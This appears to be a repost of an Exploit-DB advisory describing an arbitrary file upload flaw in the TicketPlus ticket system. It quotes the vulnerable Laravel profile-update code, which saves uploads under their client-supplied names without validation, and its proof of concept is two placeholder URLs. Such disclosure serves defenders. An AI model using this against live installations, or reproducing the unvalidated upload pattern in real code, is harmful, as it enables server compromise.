TicketPlus – Arbitrary File Upload

• Exploit Database
• 101 阅读

• 作者： Ihsan Sencan
  日期： 2017-09-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/42796/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49

  # # # # # # Exploit Title: TicketPlus - Support Ticket Management System - Arbitrary File Upload # Dork: N/A # Date: 26.09.2017 # Vendor Homepage: http://teamworktec.com/ # Software Link: https://codecanyon.net/item/ticketplus-support-ticket-management-system/20221316 # Demo: http://sportsgrand.com/demo/ticket_plus/ # Version: N/A # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # # The vulnerability allows an users upload arbitrary file.... # # Vulnerable Source: # # public function updateProfile(Request $request) { # $this->validate($request, [ # 'name' => 'required|max:32', # 'username' => 'required|max:32|unique:users,username,'.Auth::id(), # 'email' => 'email|max:40|unique:users,email,'.Auth::id() # ]); # # $user = User::find(Auth::id()); # $user->name = $request->name; # $user->username = $request->username; # $user->email = $request->email; # if(!empty($request->file)){ # $request->file->move('uploads', $request->file->getClientOriginalName()); # $user->avatar = $request->file->getClientOriginalName(); # } # $user->save(); # return redirect()->back()->withMessage('Profile updated successfully'); # } # # Proof of Concept: # # http://localhost/[PATH]/profile/settings # http://localhost/[PATH]/uploads/[FILE] # # Etc.. # # # # #